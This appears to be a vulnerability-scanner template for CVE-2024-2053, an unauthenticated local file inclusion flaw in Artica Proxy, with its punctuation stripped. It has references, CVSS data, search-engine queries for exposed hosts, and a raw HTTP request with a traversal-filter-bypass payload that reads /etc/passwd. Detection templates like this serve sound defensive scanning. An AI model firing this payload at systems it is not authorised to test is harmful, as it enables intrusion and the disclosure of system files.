id CVE-2024-2053 info name Artica Proxy - Unauthenticated LFI author pussycat0x severity high description The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the www-data user. reference - httpsgithub.com0xMarciocveblobmain2024CVE-2024-2053.md#cve-2024-2053 - httpsseclists.orgfulldisclosure2024Mar11 - httpskorelogic.comResourcesAdvisoriesKL-001-2024-001.txt classification cvss-metrics CVSS3.1AVNACLPRNUINSUCHINAN cvss-score 7.5 cve-id CVE-2024-2053 cwe-id CWE-23 epss-score 0.00434 epss-percentile 0.61897 cpe cpe2.3aarticatechartica_proxy4.40 metadata vendor articatech product artica_proxy shodan-query http.htmlartica fofa-query body=artica verified true max-request 1 tags cve,cve2024,lfi,artica-proxy,articatech http - raw - GET images.listener.phpuri=1&mailattach=....................epasswdtcppasswdasswd HTTP1.1 Host {{Hostname}} matchers-condition and matchers - type regex part body regex - root.00 - type word part body words - applicationforce-download - type status status - 200 # digest 4b0a00483046022100d351bbabac086f868fb741bdc9c3af89b207275d3da6890f6c50ee1d9ee9f558022100ec130a0bb408129f780dcb68178a50c96512e734b619903c5bfb819a26e8a5f8922c64590222798bb761d5b6d8e72950